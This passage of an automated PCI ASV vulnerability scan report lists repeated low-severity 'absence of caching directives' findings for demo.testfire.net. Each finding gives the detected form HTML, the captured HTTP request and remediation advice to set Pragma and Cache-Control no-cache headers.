231 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net/index.jsp?content=personal.htm


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 572 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://demo.testfire.net/index.jsp?content=personal.htm


HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

232 Absence of caching 2.1 Low Pass URL: https://65.61.137.117:8443/index.jsp?content=personal.htm

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 573 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

directives for pages having Port: tcp/8443


forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
https://65.61.137.117:8443/index.jsp?content=personal.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 574 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
response containing form.

233 Absence of caching 2.1 Low Pass URL: https://65.61.137.117:8443/login.jsp


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 575 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Request: GET https://65.61.137.117:8443/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

234 Absence of caching 2.1 Low Pass URL: http://65.61.137.117:8080/doLogin


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://65.61.137.117:8080/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 576 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1


Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

235 Absence of caching 2.1 Low Pass URL: https://65.61.137.117/index.jsp?content=inside_contact.htm


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 577 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
https://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 578 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

236 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net/index.jsp?content=inside_contact.htm


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
http://demo.testfire.net/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 579 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

237 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net/


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://demo.testfire.net/ HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 580 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

238 Absence of caching 2.1 Low Pass URL: https://65.61.137.117:8443/index.jsp?content=inside_contact.


directives for pages having htm
forms Port: tcp/8443

Data submitted via forms present on pages without caching directives,


can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET -
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
https://65.61.137.117:8443/index.jsp?content=inside_contact.htm
HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 581 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

239 Absence of caching 2.1 Low Pass URL: https://65.61.137.117:8443/feedback.jsp


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 582 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<form name="cmt" method="post" action="sendFeedback">


<input type="hidden" name="cfile" value="comments.txt">
<input name="name" size="25" type="text" value="">
<input name="email_addr" type="text" size="25">
<input name="subject" size="25">
<input type="submit" value=" Submit " name="submit">
<input type="reset" value=" Clear Form " name="reset">

Request: GET https://65.61.137.117:8443/feedback.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

240 Absence of caching 2.1 Low Pass URL: https://65.61.137.117:8443/index.jsp?content=business.htm


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 583 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
https://65.61.137.117:8443/index.jsp?content=business.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

241 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net/feedback.jsp


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 584 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form name="cmt" method="post" action="sendFeedback">


<input type="hidden" name="cfile" value="comments.txt">
<input name="name" size="25" type="text" value="">
<input name="email_addr" type="text" size="25">
<input name="subject" size="25">
<input type="submit" value=" Submit " name="submit">
<input type="reset" value=" Clear Form " name="reset">

Request: GET http://demo.testfire.net/feedback.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 585 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

242 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net/sendFeedback


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: POST https://demo.testfire.net/sendFeedback HTTP/1.1


Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 586 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

243 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net/index.jsp?content=business.htm


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 587 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://demo.testfire.net/index.jsp?content=business.htm


HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

244 Absence of caching 2.1 Low Pass URL: http://65.61.137.117/


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.

Remediation:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 588 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

245 Absence of caching 2.1 Low Pass URL: http://65.61.137.117/login.jsp


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 589 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<input type="submit" name="btnSubmit" value="Login">

Request: GET http://65.61.137.117/login.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

246 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net:8443/doLogin


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net:8443/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 590 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1


Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

247 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net:8443/feedback.jsp


Port: tcp/8443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 591 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

directives for pages having


forms Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form name="cmt" method="post" action="sendFeedback">


<input type="hidden" name="cfile" value="comments.txt">
<input name="name" size="25" type="text" value="">
<input name="email_addr" type="text" size="25">
<input name="subject" size="25">
<input type="submit" value=" Submit " name="submit">
<input type="reset" value=" Clear Form " name="reset">

Request: GET https://demo.testfire.net:8443/feedback.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 592 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

248 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net/


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://demo.testfire.net/ HTTP/1.1


Upgrade-Insecure-Requests: 1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 593 of 1637
